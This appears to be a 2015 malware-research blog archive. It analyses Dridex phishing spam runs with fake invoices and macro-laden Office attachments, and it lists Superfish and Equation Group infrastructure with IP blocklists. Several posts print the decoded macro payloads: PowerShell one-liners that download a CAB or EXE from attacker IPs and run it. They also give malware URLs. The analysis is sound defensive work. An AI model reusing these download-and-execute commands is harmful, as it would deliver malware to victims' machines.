Sponsored by..

Tuesday, 24 February 2015

Malware spam: "Berendsen UK Ltd Invoice 60020918 117" / "donotreply@berendsen.co.uk"

This fake invoice is not from Berendsen UK Ltd but is a simple forgery. They are not sending out the spam and their systems have not been compromised in any way. Instead, this email has a malicious Word document attached.

From:    donotreply@berendsen.co.uk
Date:    24 February 2015 at 08:09
Subject:    Berendsen UK Ltd Invoice 60020918 117

Dear Sir/Madam,

Please find attached your invoice dated 21st February.
All queries should be directed to your branch that provides the service. This detail can be found on your invoice.


Thank you.

___________________________________________________________
This e-mail and any attachments it may contain is confidential and
intended for the use of the named addressee(s) only. If you are not
the intended recipient, you have received it in error, please
immediately contact the sender and delete the material from your
computer system. You must not copy, print, use or disclose its
contents to any person. All e-mails are monitored for traffic data and
the content for security purposes.

Berendsen UK Ltd, part of the Berendsen plc Group.
Registered Office: 4 Grosvenor Place, London, SW1X 7DL.
Registered in England No. 228604
I have only seen one sample of this email, with a Word document IRN001549_60020918_I_01_01.doc which has a zero detection rate. Contained within this is malicious Word macro which downloads a component from the following location:

http://heikehall.de/js/bin.exe

This binary has a VirusTotal detection rate of 2/57. Automated analysis tools [1] [2] [3] show that it attempts to phone home to:

92.63.87.13 (MWTV, Latvia)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
78.140.164.160 (Webazilla, US)
31.160.233.212 (KPN, Netherlands)
185.14.30.98 (UA Servers, Ukraine)
86.104.134.156 (One Telecom, Moldova)


MWTV have featured several times on this blog. A close examination of their 92.63.80.0/20 block indicates a mix of legitimate and illegitimate sites, however the bad sites are concentrated in the following ranges:

92.63.82.0/23
92.63.84.0/22
92.63.88.0/24

In addition to this, the malware attempts to drop a Dridex DLL which is widely detected by AV vendors with a detection rate of 30/57.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
5.196.241.196
66.110.179.66
202.44.54.5
78.140.164.160
31.160.233.212
185.14.30.98
86.104.134.156

Thursday, 19 February 2015

Malware spam: "State Department" / "Order state T/N:" with a hidden message

These spam emails claim both to be from the "State Department" and somebody else at the same time, so I guess they must have been sent by the intern at Dridex HQ. And also they have a hidden message, apparently aimed at me..

From:    Hollie Wyatt , State Department
Date:    19 February 2015 at 12:13
Subject:    Order state T/N:XZ3543_327

Your order is ready for collection at your chosen store.View full order details T/N:XZ3543_327 in attached document.

Thanks!
Hollie Wyatt .
PRAETORIAN RESOURCES LTD

----------

From:    Jodi Russell , State Department
Date:    19 February 2015 at 12:16
Subject:    Order state T/N:HD6061_902

Your order is ready for collection at your chosen store.View full order details T/N:HD6061_902 in attached document.

Thanks!
Jodi Russell .
BARON OIL PLC

----------

From:    Nathanial Mckinney , State Department
Date:    19 February 2015 at 13:26
Subject:    Order state T/N:UH0141_809

Your order is ready for collection at your chosen store.View full order details T/N:UH0141_809 in attached document.

Thanks!
Nathanial Mckinney .
SIRIUS MINERALS PLC
Attached is a ZIP file that largely matches the reference number in the email, and inside that is a malicious spreadsheet called Order.xls which contains this macro.

In there is the usual combination of an encrypted string and decryption routine. Feed one into the other and you get..
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.123/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
But wait.. what's this?
http://85.143.166.123/ssdynamooss/sspidarss.cab
"Пидар" is not in my limited Russian vocabulary, but it seems to translate as a tradition type of meatball in gravy.

Faggots with more sauce!  Hooray

Incidentally, 85.143.166.123 is a Pirix IP in Russia, and I have also seen malicious activity on the following Pirix IPs:

85.143.166.123
85.143.166.72
85.143.166.132

37.139.47.167
37.139.47.103
37.139.47.117
37.139.47.105

So I think I'm going to recommend blocking a couple of Pirix /24s at the end.

Anyway.

The macro downloads a file from http://85.143.166.123/ssdynamooss/sspidarss.cab which it saves as %TEMP%\FgdgFFFgfgF.cab and it then attempts to EXPAND it to %TEMP%\FgdgFFFgfgF.exe which doesn't quite work as expected, because the .CAB file is already an .EXE file. Must the the intern again. Anyway, EXPAND simply copies the file from CAB to EXE so it still works.

This executable has a VirusTotal detection rate of 8/57. Automated analysis tools [1] [2] plus some private sources indicate that this malware calls out to some familiar IPs:

82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)

According to the Malwr report,  it drops the same Dridex DLL that has been doing the rounds all day, with a VirusTotal detection rate of 8/57.

Update:
A second spam run is happening, with various senders and subjects, for example:
Byron Pittman , Bill Department
Freda Kelly , Bill Department
Leroy Gallegos , Bill Department
Terrence Reyes , Bill Department
Tyson Miller , Bill Department
Marlene Morales , Bill Department
Royal Byrd , Bill Department
Larry Kramer , Bill Department
Jenna Sparks , Bill Department
Debra Thomas , Bill Department

LE8427_395.zip attached   
MM4565_687.zip attached
SL7772_820.zip attached
MF9529_495.zip attached
DH0645_249.zip attached
ED9340_241.zip attached
HJ7305_966.zip attached
UA0899_018.zip attached
HO2362_958.zip attached
JL3695_098.zip attached
There are three different ZIP files, containing either Order.xls, Confirmation.xls or order_tatus.xls (sic). The macro is similar to the one above, but has a couple of other download locations.
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://134.19.180.44/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;

These are:

134.19.180.44 (Global Layer, NL)
185.48.56.137 (Sinarohost, NL)

Payload is the same as before.


Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
85.143.166.0/24
37.139.47.0/24
134.19.180.44
185.48.56.137

Malware spam: "This is your Remittance Advice #CCI36306" / "Violet Garner [Jodi.1d@ip-35-29-71-77.bgwan.com]" / "Saint Gobain UK"

This fake financial email does not come from Saint Gobain UK but is instead a forgery with a malicous attachment.
From:    Violet Garner [Jodi.1d@ip-35-29-71-77.bgwan.com]
Date:    19 February 2015 at 11:25
Subject:    This is your Remittance Advice #CCI36306

DO NOT REPLY TO THIS EMAIL ADDRESS

Please find attached your remittance advice from Saint Gobain UK.
For any queries relating to this remittance please notify the Payment Enquiry Team on 01484946582

Regards,
SGBD National Payments Centre
I have seen two different versions of the malicious attachment CCI36306.xls, one of which is functionally identical to this one, the other one downloads a file from:

http://hummel-29.de/js/bin.exe

This malicious binary is the same one as used in two other spam runs today [1] [2].


Malware spam: "Marylou Champagne [marylou@droitcour.com]" / "Proforma Invoice"

This fake financial spam comes with a malicious attachment:

From:    Marylou Champagne [marylou@droitcour.com]
Date:    19 February 2015 at 09:41
Subject:    Proforma Invoice

Good Afternoon,

We have your purchase order SP14216 ready to ship.
Please advise if you will prepay or should we send COD.

Thank you,
Marylou
This email is not from Droitcour and their systems and data have not been hacked or compromised in any way. Instead, this is a simple forgery that comes with a malicious Excel document attached.

So far I have only seen a single sample of the attachment Inv SP14216.xls which contains a malicious macro (similar to the one here) which downloads a file from:

http://mondeodoslubu.cba.pl/js/bin.exe

This trojan download is identical to the one I mentioned here and it leads to the same payload.

Malware spam: "Maria Wilson" / "securigroup.co.uk" / "Statement"

This fake financial spam does not come from SecuriGroup, their systems have not been compromised in any way nor has there been any leak of information. Instead, this is a simple forgery with a malicious document attached.

From:    Maria Wilson [maria.wilson6870@securigroup.co.uk]
Date:    19 February 2015 at 09:10
Subject:    Statement

Please see attached up to date statement.

I would be grateful if you could confirm all due invoices have been processed for payment.

Many thanks
Maria

Maria Wilson | Credit Controller

T: 0141 285 3838


www.securigroup.co.uk


Think Sustainability - Do not print this email unless essential


This email and any attachments are confidential and intended for the addressee only.

If you are not the named recipient, you must not use, disclose, reproduce, copy or distribute the contents of this communication.

If you have received this in error, please contact the sender and then delete this email from your system.
The impact on this innocent company appears to be severe, with their website currently suspended.

I have only seen only sample of the attachment Statement 18 FEB 2015.xls although there are probably other variants. This contains a set of macros [password=infected] which are mostly crap, but the key parts are Modules 13 (the encrypted strings) and 27 (the decrypt function). These macros download a file from the following location:

http://hazardcheck.de/js/bin.exe

This is saved as %TEMP%\FfdgF.exe which has a VirusTotal detection rate of 5/57. Various automated analysis tools [1] [2] [3] show attempted network connections to:

83.169.4.178 (Hosteurope, Germany)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
14.99.146.242 (Tata Indicom, India)
78.140.164.160 (Webazilla, US)
220.143.5.92 (Chunghwa Telecom, Taiwan)
217.12.203.34 (ITL Company, Bulgaria)

The Malwr report shows it dropper another version of the downloader (VT 3/57) and a malicious DLL (VT 6/57). Payload is probably Dridex.

Recommended blocklist:
83.169.4.178
66.110.179.66
202.44.54.5
14.99.146.242
78.140.164.160
220.143.5.92
217.12.203.34



Some Superfish domains and IP addresses and ranges you might want to look for

In the light of the growing Lenovo / Superfish fuss, I set out to identify those Superfish domains and IPs that I could, for the purposes of blocking or monitoring.

The domains and IPs that I have been able to identify are here [csv].

Superfish appear to operate the following domains (and several subdomains thereof):

venn.me
best-deals-products.com
superfish.com
pin2buy.net
pintobuy.net
similarproducts.net
adowynel.com
govenn.com
group-albums.com
jewelryviewer.com
likethatapps.com
likethatdecor.com
likethatpet.com
likethatpets.com
testsdomain.info
superfish.mobi
vennit.net
superfish.us

These following IP addresses and ranges appear to be used exclusively by Superfish (some of their other domains are on shared infrastructure).

66.70.35.240/28
66.70.34.64/26
66.70.34.128/26
66.70.34.251
66.70.35.12
66.70.35.48

All of those IPs are allocated to Datapipe in the US. Superfish itself is based in Israel, which seems to be a popular place to develop adware.

Do with this data what you will, if you have any more IPs or domains then perhaps you might share them in the Comments.

Wednesday, 18 February 2015

Multiple spam emails using malicious XLS or XLSM attachment

I'm seeing multiple spam runs (probably pushing the Dridex banking trojan) with no body text, various subjects and either an XLS or XLSM attachment.

Example subjects include:
Copy [ID:15E376774] attaced
RE: Requests documentation [458C28133]
Request error [C3843]
Request error [FDF396530]
Requests documentation [242B035667]


Attachments look something similar to this:
15E376774.xlsm
242B035667.xlsm
458C28133.xls
C3843.xls
FDF396530.xlsm

The XLS and XLSM files are different structurally.. the XLSM files are basically an Office 2007 ZIP archive of all the data components, the XLS files are an old school Office 2003 file. Nevertheless, they contain a macro with 23 components to make it harder to analyse, although the important modules are Module 11 which contains the text string to decrypt, and Module 14 which contains the decryption function itself. Almost everything else is irrelevant.

Once the string is decrypted, it becomes fairly obvious what it going on. So far, there appear to be four strings with different download locations:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.151/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.235/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
So, we can see a file dxzq.jpg being downloaded which is actually a CAB file (JIOiodfhioIH.cab) which is then expanded to JIOiodfhioIH.exe and then run.

For information, these IPs are hosted by:

5.196.243.7 (OVH, Ireland)
46.30.42.151 (Eurobtye LLC, Russia)
176.31.28.235 (OVH, France)
92.63.88.63 (MWTV, Latvia)

This executable has a detection rate of 4/56. Automated analysis [1] [2] [3] shows attempted network connections to:

82.151.131.129 (Doruknet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)

The Malwr report shows that it also drops a DLL with a detection rate of just 1/56.

Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
5.196.243.7
46.30.42.151
176.31.28.235
92.63.88.63

For research purposes, a copy of the files analysed and dropped can be found here, password is infected

Malware spam: "UK Fuels Esso E-bill" / "invoices@ebillinvoice.com"

This fake invoice is a forgery with a malicious attachment:
 
From:    invoices@ebillinvoice.com
Date:    18 February 2015 at 09:01
Subject:    UK Fuels Esso E-bill

Customer No         : 90714
Email address       : [redacted]
Attached file name  : 36890_06_2015.DOC (ZIP)

Dear Customer

Please find attached your invoice for Week 06 2015.

If you have any queries regarding your e-bill you can contact us at invoices@ebillinvoice.com.
Alternatively you can log on to your account at www.velocitycardmanagement.com to review your transactions and manage your account online.

Yours sincerely


Customer Services
UK Fuels



======================================================
This email, its content and any files transmitted with
it are confidential and intended solely for the use of
the individual(s) to whom it is addressed.
If you are not the intended recipient, be advised that
you have received this email in error and that any use,
dissemination, forwarding, printing or copying of
this email is strictly prohibited.
======================================================
I have only seen a single sample of this, with a ZIP file 36890_06_2015.zip attached, which in turn contains a document 36890_06_2015.doc. This document contains a malicious macro, and is exactly the same as the one used in this campaign leading to the Dridex banking trojan.

Malware spam: "[dan@express-insurance.net]" / "Auto insurance apps and documents"

 This fake financial spam has a malicious attachment:


From:    Dan Bigelow [dan@express-insurance.net]
Date:    18 February 2015 at 09:18
Subject:    Auto insurance apps and documents

Hello ,

Please print “All” attached forms and sign and initial where I highlighted.

Scan and email back to me or fax to me at 407-937-0511.


Sincerely,

Dan Bigelow


Referrals are important to us. If you know anyone who would benefit from our services, please contact me. 

We would appreciate the opportunity to work with them.

2636 West State Rd 434 # 112
Longwood, Fl 32779


Fax     407-386-1601

This spam does not actually come from Express Insurance nor have their systems or data been compromised in any way. Instead this is a simple forgery with a malicious Word document attached.

There are actually at least two different versions of the document with zero detections [1] [2]. The macros are a bit too complex for pastebin, but you can download a ZIP here and here [password=infected].

Despite the difference, both seem to download from:

http://ecv.bookingonline.it/js/bin.exe

The download file is saved as %TEMP%\FfdgF.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] indicate that it attempts to phone home to:

83.169.4.178 (Hosteurope, Germany)
202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)

This probably drops a Dridex DLL, however the Malwr analysis appears to have malfunctioned and I don't have a sample.

Recommended blocklist:
83.169.4.178
202.44.54.5
66.110.179.66

Tuesday, 17 February 2015

An analysis of reported Equation Group IP ranges and domains

There has been a lot of buzz this morning about "The Equation Group", a possible state actor involved in placing malware on hard disks [1] [2] [3] [4].

Securelist (in conjunction with Kaspersky) published a list of domains and IPs to do with this malware, but with very little information about where they were hosted. After all, if they a hosted in a shed next to the bus station in Tiraspol or some underground complex buried under Wutong Mountain, then it's a rather different proposition from some secretive organisation in Washington DC.

Securelist post a number of hardcoded IPs as well as some domain names. Kaspersky have sinkholed some of the domains, and I can see one other active sinkhole. At least one of the domains is parked. Some of the domains look like they are not in use.

The data I collected can be found here, but before you use any of it, I will explain in more detail so you can use it prudently.

There are several web hosts and networks involved, all over the world. Some seem to have a higher certainty of involvement than others. In most cases, the Equation Group have rented a bunch of servers with contiguous IP addresses (I call this the "Equation Range") which is the one that I recommend you monitor. Some web hosts have other suspect IP addresses in the same neighbourhood, but in order to keep things simple I am not going into that.

(Updated 18/2/15 to remove an OpenDNS sinkhole and add 41.222.35.70)

FLAG Telecom / Reliance Globalcom

62.216.152.64/28
80.77.2.160/27
80.77.4.0/26

Allegedly a partner of the NSA and GCHQ, these IP addresses appear to be in the UK, US and Egypt (I would doubt the accuracy of the WHOIS data for the last one). In addition to apparently hardcoded IPs, they also host:

team4heat.net
forgotten-deals.com
phoneysoap.com
cigape.net
mimicrice.com
charmedno1.com
functional-business.com
rehabretie.com
advancing-technology.com
crisptic01.net
tropiccritics.com
cribdare2no.com
following-technology.com
teatac4bath.com

Verizon

194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
202.95.84.32/27
210.81.52.96/27
212.177.108.192/27

Another company with a long history with the NSA, these Verizon IPs are all located outside the United States, specfically the Netherlands, Singaporre, Japana and Italy. In addition to hardcoded IPs, they are hosting:

honarkhaneh.net
meevehdar.com
parskabab.com
ad-noise.net
ad-void.com
aynachatsrv.com
damavandkuh.com
fnlpic.com
monster-ads.net
nowruzbakher.com
sherkhundi.com
quickupdateserv.com
goodbizez.com
www.dt1blog.com
www.forboringbusinesses.com
timelywebsitehostesses.com
technicads.com
darakht.com
ghalibaft.com
adservicestats.com
downloadmpplayer.com
honarkhabar.com
techsupportpwr.com
webbizwild.com
zhalehziba.com

Global Telecom & Technology Americas Inc. / Cogent / PSInet

149.12.71.0/26

This Cogent customer has at least four different IPs hosting Equation Group servers. The following domains are hosted:

avidnewssource.com
rubi4edit.com
listennewsnetwork.com
unite3tubes.com

Colombia: Alfan Empaques Flexibles S.A. / Columbus Networks / IFX Networks / Terremark

64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
190.60.202.0/28
190.60.202.0/28

The relationship between the US and Colombia is difficult, with the former spying on the latter extensively. Why there should be a cluster of servers in Colombia connected with this is a mystery. In addition to hardcoded IPs, the following domains are hosted in Colombia:

selective-business.com
technicalconsumerreports.com
technicaldigitalreporting.com
technology-revealed.com
melding-technology.com

Czech Republic: Master Internet / IT-PRO / 4D Praha

81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27

A group of three internet companies (possibly using the same infrastructure) also appear to be involved. All these IPs appear to be in the city of Brno, which is also home to the Czech National Cyber Security Center. Coincidence? The following domains can be found on Czech IPs in addition to hardcoded addresses:

islamicmarketing.net
noticiasftpsrv.com
coffeehausblog.com
platads.com
nickleplatedads.com
arabtechmessenger.net

Spain: Terremark / GTT Global Telecom

84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28


Terremark also provide hosting services for Equation in Colmbia, and of course Spain is a long-time ally of the United States and United Kingdom. Web sites hosted:

businessedgeadvance.com
business-made-fun.com
rampagegramar.com
unwashedsound.com
businessdealsblog.com
industry-deals.com
itemagic.net
posed2shade.com
slayinglance.com
rubiccrum.com
rubriccrumb.com

Netherlands: Tripartz-Atrato / IX Reach / Claranet / FiberRing

212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109

In addition to Verizon, four other Netherlands companies are hosting Equation Group servers. The Netherlands is another long-time ally of the US and UK.

arm2pie.com
businessdirectnessource.com
housedman.com
taking-technology.com
micraamber.net
charging-technology.com
brittlefilet.com
dowelsobject.com
speedynewsclips.com

Malaysia: Piradius NET

124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29

Often appearing to be a "go-to" company if you want to set up a Black Hat reseller, these domains and IPs look like they have been picked up as part of a commercial offering.

roshanavar.com
adsbizsimple.com
bazandegan.com
amazinggreentechshop.com
foroushi.net
technicserv.com
afkarehroshan.com
thesuperdeliciousnews.com
sherkatkonandeh.com
mashinkhabar.com

Other ranges and hosts

  • RACSA in Costa Rica hosts customerscreensavers.com and xlivehost.com on 196.40.84.8/29.
  • EasySpeed in Denmark hosts  quik-serv.com and goldadpremium.com on 82.103.134.48/30.
  • Cyber Cast International in Panama hosts havakhosh.com and toofanshadid.com on 200.115.174.254.
  • EM Technologies in Panama hosts technicupdate.com and rapidlyserv.com on 201.218.238.128/26.
  • INET in Thailand hosts globalnetworkanalys.com on 203.150.231.49 with an apparently hardcoded IP of 203.150.231.73 in use as well.
  • American Internet Services hosts suddenplot.com on 207.158.58.102.
  • GoDaddy hosts serv-load.com and wangluoruanjian.com on 97.74.104.208.
  • Quadranet / GZ Systems hosts fliteilex.com plus some other questionable domains on 67.215.237.104/29.
  • Vegas Linkup LLC hosts standardsandpraiserepurpose.com on 209.59.42.97.
  • Vox Telecom in South Africa hosts mysaltychocolateballs.com on 41.222.35.70 having previously hosted forboringbusinesses.com.
In all the following network blocks and IPs appear to be hosting servers connected to the Equation Group:

64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
69.42.114.96/28
196.40.84.8/29
81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27
82.103.134.48/30
80.77.2.160/27
84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28
212.177.108.192/27
210.81.52.96/27
124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29
212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109
194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
200.115.174.254
201.218.238.128/26
202.95.84.32/27
203.150.231.49
203.150.231.73
62.216.152.64/28
207.158.58.102
149.12.71.0/26
80.77.4.0/26
97.74.104.208
67.215.237.104/29
209.59.42.97
41.222.35.70

I recommend that you look at the data before you do drastic things with these IP ranges.

Now, I don't know for certain that this malware is a government actor, but the IP address indicate that whoever it is has a relationship with these companies (especially Verizon). That certainly feels like a state actor to me..

Something evil on 92.63.88.0/24 (MWTV, Latvia)

I've been tracking Dridex for some time, and I keep seeing IPs for MWTV in Latvia cropping up. So far I have seen:

92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108

I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend blocking 92.63.88.0/24 on your network perimeter.

Malware spam: "AR.Support@efi.com" / "Customer statement 0001031389 as on 02/05/2015"

This fake financial document has a malicious attachment:

From:    AR.Support@efi.com
To:    minutemanpresschicago@comcast.net
Date:    17 February 2015 at 10:22
Subject:    Customer statement 0001031389 as on 02/05/2015

Dear EFI Customer,


Please find attached your statement for this month. If you need invoice
copies or have any questions you can reply to this e mail and we will
contact you at the earliest.


Regards,
AR Support
AR.Support@efi.com


** Attention AP Department ** Effective April 25th our new remittance address will change to
the following. Please update your records. Thank you.

PO Box 742366
Los Angeles, CA. 90074-2366

Confidentiality notice: This message may contain confidential information. It is intended only for the person to whom it is addressed. If you are not that person, you should not use this message. We request that you notify us by replying to this message, and then delete all copies including any contained in your reply. Thank you.
Attached is a Word document Customer statement 0001031389 as on 02052015.DOC which comes in two different types with zero detection rates [1] [2] containing two highly obfuscated modular macros [1] [2]  that actually just perform a ROT13 transformation on a couple of strings.

uggc://zjpbq4.pon.cy/wf/ova.rkr
uggc://nyhpneqban.pbz/wf/ova.rkr

Which decodes to:

http://mwcod4.cba.pl/js/bin.exe
http://alucardona.com/js/bin.exe

This has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] [3] shows the malware attempting to connect to:

202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
92.63.88.105 (MWTV, Latvia)

According to the Malwr report this drops a DLL with a detection rate of 2/57 which is probably Dridex.

Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105

Malware spam: "Unpaid invoice [ID:9876543210]" drops Dridex

This fake invoice comes with no body text, a random ID: in the subject and a randomly-named malicious Excel attachment

Date:    17 February 2015 at 14:05
Subject:    Unpaid invoice [ID:9876543210]
Some example attachment names are:

3356201778.xls
5EABA06572.xls
6F5FE56048.xls
A6AA331555.xls
B2D4C97246.xls
C9E5445852.xls

There are found different variants, all with very low detection rates at VirusTotal [1] [2] [3] [4]. Each one contains a different variety of macros, and unlike previous spam runs, these are individual modules (which frankly makes it no harder to analyse, just harder to put into Pastebin).

When we decrypt the strings in the macro, we see:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.129.153.27/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://62.76.43.194/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.4.232.206/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
This combines the recent Powershell trick with a new one. Instead of downloading an EXE file, it downloads and unpacks a CAB file, dfssk.cab which is saved in the %TEMP% folder and then expanded to %TEMP%\JIOiodfhioIH.exe.

These download locations are:
92.63.88.87 (MWTV, Latvia)
78.129.153.27 (iomart, UK)
62.76.43.194 (IT House / Clodo-Cloud, Russia)
46.4.232.206 (Hetzner, Germany / Dmitry Zheltov, Russia)

Automated analysis tools [1] [2] [3] show this POSTing to 92.63.88.97 (MWTV,  Latvia), which is definitely worth blocking. Note that one of the download locations for the binary is only a few IPs away at  92.63.88.87.

ThreatExpert also shows attempted network connections to 92.63.88.97 plus:
136.243.237.194 (Hetzner, Germany)
74.208.68.243 (1&1, US)

This Malwr report shows a DLL with MD5 b83b18ffe375fad452c02bdf477864fe which has a VirusTotal detection rate of 3/57.

Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194

46.4.232.206
136.243.237.194
74.208.68.243

Monday, 16 February 2015

Money mule scam: gbearn.com / usaearns.com

This spam email is attempting to recruit people to aid with money laundering ("money mules") and other illegal operations.

Date:    16 February 2015 at 21:29
Subject:    New offer

Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.

Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.

We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.
Part-time employment is currently important.
We offer a wage from 3500 GBP per month.

If you are interested in our offer, mail to us your answer on riley@gbearn.com and
we will send you an extensive information as soon as possible.
Respectively submitted

Personnel department
The reply-to address of gbearn.com has recently been registered by the scammers with false WHOIS details. There is also an equivalent domain usaearns.com for recruiting US victims.

Although there is no website, both domains have a mail server at 93.188.167.170 (Hostinger, US) which also serves as one of the nameservers for these domains (ns1.recognizettrauma.net). The other nameserver (ns2.recognizettrauma.net) is on 75.132.186.90 (Charter Communications, US).

Be in no doubt that the job being offered here is illegal, and you should most definitely avoid it.

Malware spam: "L&A Plastic Order# 66990" / "Hannah [Hannah@lapackaging.com]"

This fake financial spam does not come from LA Packaging, their systems are not compromised in any way. Instead, this is a simple forgery with a malicious attachment:

From:    Hannah [Hannah@lapackaging.com]
Date:    16 February 2015 at 10:38
Subject:    L&A Plastic Order# 66990

For your records, please see attached L&A Order# 66990 and credit card receipt.
It has shipped today via UPS Ground Tracking# 1Z92X9070369494933

Best Regards,
Hannah – Sales
L&A Plastic Molding / LA Packaging
714-694-0101 Tel - Ext. 110
714-694-0400 Fax
E-mail: Hannah@LAPackaging.com
Attached is a malicious Word document 66990.doc - so far I have only seen one version of this, although there are usually several variants. This document contains a macro [pastebin] which downloads an executable from:

http://hoodoba.cba.pl/js/bin.exe

At present this has a detection rate of 6/57. It is the same malware as seen in this spam run.

Malware spam: "Re: Data request [ID:91460-2234721]" / "Copy of transaction"

This rather terse spam comes with a a malicious attachment:

From: Rosemary Gibbs
Date:    16 February 2015 at 10:12
Subject:    Re: Data request [ID:91460-2234721]

Copy of transaction.
The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are

869B54732.xls
BE75129513.xls
C39189051.xls

None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro looks like this (click to enlarge):

It's quite apparent that this is ROT13 encoded which you can easily decrypt at rot13.com rather than working through the macro. These three samples give us:

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.104/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.175.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"
So, these macros are attempting to use Powershell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57 and automated analysis tools [1] [2] [3] show attempted communications with:

85.143.166.72 (Pirix, Russia)
